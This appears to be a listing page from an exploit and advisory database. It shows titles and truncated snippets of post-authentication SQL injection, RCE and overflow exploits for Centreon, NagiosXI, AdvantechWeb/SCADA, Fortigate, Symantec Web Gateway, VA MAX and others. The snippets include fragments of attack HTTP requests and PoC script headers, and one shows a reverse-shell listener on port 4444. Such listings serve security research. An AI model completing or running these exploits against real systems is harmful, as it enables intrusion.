📄 AudioCodes Fax/IVR Appliance 2.6.23 File Upload / Code Execution / Privilege Escalation

AudioCodes Fax/IVR Appliance versions 2.6.23 and below suffer from multiple code execution and command injection vulnerabilities as well as privilege escalation, file upload, and file read vulnerabilities. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory Information Title: 8 vulnerabiliti...

VulnCheck KEV: CVE-2024-40891

Multiple Zyxel DSL CPE devices contain a post-authentication command injection vulnerability in the management commands that could allow an authenticated attacker to execute OS commands via Telnet...

Centreon 23.10-1.el8 SQL Injection

;; Postauth SQL Injection in Centreon 23.10-1.el8 ;; by code610 ;; ;; found : 05.03.2024 ;; version: centreon-vbox-vm-2310-1.el8.zip ;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html ;; ;; sqlmap request.txt POST /centreon/main.get.php?p=60201 HTTP/1.1 Host...

Centreon 23.10-1.el8 SQL Injection Vulnerability

;; Postauth SQL Injection in Centreon 23.10-1.el8 ;; by code610 ;; ;; version: centreon-vbox-vm-2310-1.el8.zip ;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html ;; ;; sqlmap request.txt POST /centreon/main.get.php?p=60201 HTTP/1.1 Host: 192.168.56.156...

AdvantechWeb/SCADA 9.1.5U SQL Injection

;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U ;; ;; found: 28.12.2023 ;; ;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html ;; POST /waconfig/api/odbc/getSystemLog HTTP/2 Host: 192.168.56.106 Cookie: serverLanguage=en;...

AdvantechWeb / SCADA 9.1.5U SQL Injection Vulnerability

AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability. ;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U ;; ;; found: 28.12.2023 ;; ;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html ;; POST...

Fortigate 7.0.1 Stack Overflow Exploit

c@ubuntu:/LABS$ cat fp17.py !/usr/bin/env python3 fortigate 7.0.1 postauth stack overflow 0day more: https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html Pid: 00243, application: newcli, Firmware: FortiGate-VM64 v7.0.1,build0157b0157,210714 GA Release, Signal 6 received, Backtrace:...

openSUSE: Security Advisory for nagios (openSUSE-SU-2021:0715-1)

The remote host is missing an update for the Copyright C 2021 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

NagiosXI 5.6.11 start / end / step Remote Code Execution Exploit

Exploit for php platform in category web applications Title: Postauth RCE in NagiosXI 5.6.11 Vendor: www.nagios.com Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ email protected:/src/eonila/nagiospox$ cat nagiospox.py !/usr/bin/env...

NagiosXL 5.6.11 orderby SQL Injection

Title: Postauth SQL injection in NagiosXI 5.6.11 param: orderby Date: 13.03.2020 Vendor: https://www.nagios.com/ Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ c@kali:$ cat n2.txt GET...

Centreon 19.11 SQL Injection

Title: Postauth SQL injection in Centreon 19.11 param: aclresname Date: 03.04.2020 Vendor: https://www.centreon.com/ Vulnerable software: https://download.centreon.com/index.php?product=19.10&action=ask&id=5074 Repo: https://github.com/c610/free/ c@kali:$ cat cent.sqli POST...

NagiosXI 5.6.11 start / end / step Remote Code Execution

Title: Postauth RCE in NagiosXI 5.6.11 Date: 19.03.2020 Vendor: www.nagios.com Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/ Repo: https://github.com/c610/free/ c@kali:/src/eonila/nagiospox$ cat nagiospox.py !/usr/bin/env python nagiospox.py - small poc for nagiosxi rce...

Symantec Web Gateway 5.0.2.8 Remote Code Execution

Title: Postauth RCE in Symantec Web Gateway 5.0.2.8 Date: 27.03.2020 Vendor: www.symantec.com Vulnerable software: www.symantec.com Repo: https://github.com/c610/free/ POST /spywall/timeConfig.php HTTP/1.1 Host: 192.168.216.133 User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:73.0...

VA MAX 8.3.4 - (Authenticated) Remote Code Execution

VA MAX 8.3.4 - Authenticated Remote Code Execution root@nippur:/home/c/src/nippur cat vamax3.py !/usr/bin/env python quick poc for postauth rce bug in va max 8.3.4 more: https://code610.blogspot.com 10.02.2019 p.s. listening on any 4444 ... 192.168.1.126: inverse host lookup failed: Unknown host...

Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)

Exploit for unknown platform in category web applications ================================================================ Joomla Component JPad 1.0 SQL Injection Vulnerability postauth ================================================================ Joomla Component JPad Remote SQL Injection...